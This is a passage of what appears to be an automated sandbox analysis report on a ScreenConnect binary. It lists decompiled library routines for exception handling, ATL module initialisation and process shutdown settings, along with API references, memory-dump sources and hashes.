                                                                          0x003fc628 0x003fc628 0x003fc62b 0x003fc630 0x003fc633 0x003fc635 0x003fc638 0x003fc63b 0x003fc63c 0x003fc63f 0x003fc644 0x003fc644 0x003fc647 0x003fc64b 0x003fc64e 0x003fc653 0x003fc650 0x003fc650 0x003fc650 0x003fc656 0x003fc65b 0x003fc65c 0x003fc65f 0x003fc661 0x003fc664 0x003fc667 0x003fc668 0x003fc671 0x003fc676 0x003fc679 0x003fc67f 0x003fc682 0x003fc685 0x003fc688 0x003fc689 0x003fc68c 0x003fc697 0x003fc69b 0x00000000 0x003fc69b 0x003fc6a2

                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 003FC63F
                                                                            • Part of subcall function 003FCC56: ___AdjustPointer.LIBCMT ref: 003FCC9F
                                                                          • _UnwindNestedFrames.LIBCMT ref: 003FC656
                                                                          • ___FrameUnwindToState.LIBCMT ref: 003FC668
                                                                          • CallCatchBlock.LIBCMT ref: 003FC68C
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          • Opcode ID: f14ab510739124f7fe63848341080ae958cc2f5809c55b2e9c9e0af2bdbeeed2
                                                                          • Instruction ID: 3c164813b6f8917902c5dff5fc36945476cfe8ee65b8a69815039dd7db542985
                                                                          • Opcode Fuzzy Hash: f14ab510739124f7fe63848341080ae958cc2f5809c55b2e9c9e0af2bdbeeed2
                                                                          • Instruction Fuzzy Hash: 0B01E93205010DBBCF135F55CD01EEA3BBAEF58754F159415FA58A5121C336E871DBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E003F1A59(intOrPtr* __ecx, void* __eflags) {
                                                                          				intOrPtr* _t13;
                                                                          
                                                                          				_t13 = __ecx;
                                                                          				E003F1AAC(__ecx);                                   // zero the structure (the subcall is _memset, see refs below)
                                                                          				 *__ecx = 0x38;                                     // cbSize: 0x38 = sizeof(_ATL_BASE_MODULE70) on x86
                                                                          				 *((intOrPtr*)(__ecx + 8)) = 0x3f0000;              // m_hInstResource = module base (the dump's Offset 003F0000)
                                                                          				 *((intOrPtr*)(__ecx + 4)) = 0x3f0000;              // m_hInst = module base
                                                                          				 *((intOrPtr*)(__ecx + 0xc)) = 0xc00;               // dwAtlBuildVer = _ATL_VER 0x0C00 (ATL 12.0)
                                                                          				 *((intOrPtr*)(__ecx + 0x10)) = 0x3fe1f8;           // pguidVer: pointer into the read-only region at 0x3FE000
                                                                          				if(E003F1040(__ecx + 0x14) < 0) {                   // m_csResource init: InitializeCriticalSectionAndSpinCount (ref 003F1043)
                                                                          					if(IsDebuggerPresent() != 0) {
                                                                          						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
                                                                          					}
                                                                          					 *0x405f5c = 1;                                 // CAtlBaseModule::m_bInitFailed = true
                                                                          				}
                                                                          				return _t13;
                                                                          			}




                                                                          Instruction addresses for the listing above (decompiler line-to-address map):
                                                                          0x003f1a5a 0x003f1a5c 0x003f1a66 0x003f1a6f 0x003f1a72 0x003f1a75 0x003f1a7c 0x003f1a8a 0x003f1a94 0x003f1a9b 0x003f1a9b 0x003f1aa1 0x003f1aa1 0x003f1aab

                                                                          APIs
                                                                            • Part of subcall function 003F1AAC: _memset.LIBCMT ref: 003F1AB9
                                                                            • Part of subcall function 003F1040: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,003F1111,00402E3C,?,003F1111,8007000E,?,?,?,00000000,003FD170,000000FF,?,003F15CD,00000000), ref: 003F1043
                                                                            • Part of subcall function 003F1040: GetLastError.KERNEL32(?,00000000,003F1111,00402E3C,?,003F1111,8007000E,?,?,?,00000000,003FD170,000000FF,?,003F15CD,00000000), ref: 003F104D
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,003F100A), ref: 003F1A8C
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003F100A), ref: 003F1A9B
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003F1A96
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 436010757-631824599
                                                                          • Opcode ID: 04f7e63ecf61ec70d9781123b83432752a461d064e89ecf51263b6032965e92f
                                                                          • Instruction ID: 8952ea8b2f36f065e4fa6ce64c14b5e49a19698ee81a6c6fd34853ccfa6ab832
                                                                          • Opcode Fuzzy Hash: 04f7e63ecf61ec70d9781123b83432752a461d064e89ecf51263b6032965e92f
                                                                          • Instruction Fuzzy Hash: ABE09274600796CFE723AF3AE9047667BE8AF00344F00895CE65AC6361EBB5D444CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Executed Functions

Control-flow Graph
(rendered graph not reproduced; legend: Executed / Not Executed)
• Function 7ffa36323502-7ffa3633560d, calls SetProcessShutdownParameters; edges: 520->523, 520->524, 523->524

APIs
Memory Dump Source
• Source File: 0000000B.00000002.1212724101.00007FFA36320000.00000040.00000001.sdmp, Offset: 00007FFA36320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ffa36320000_ScreenConnect.jbxd
Similarity
• API ID: ParametersProcessShutdown
• String ID:
• API String ID: 4192036408-0
• Opcode ID: 6db1467760e465c1d8ebbd9d6c8abd05d34f258e8df59c1b8a0dd3a8a10c14d7
• Instruction ID: 3cbeee1ff25349057087fdec9d32b010f3886c2f7733400f1d1fa3d033c2e4b7
• Opcode Fuzzy Hash: 6db1467760e465c1d8ebbd9d6c8abd05d34f258e8df59c1b8a0dd3a8a10c14d7
• Instruction Fuzzy Hash: BB21D63190860C9FEB14EF98D84A7F977E4EB59321F10812ED44DC3216DA74A846CB91
Uniqueness
• Uniqueness Score: -1.00%

Non-executed Functions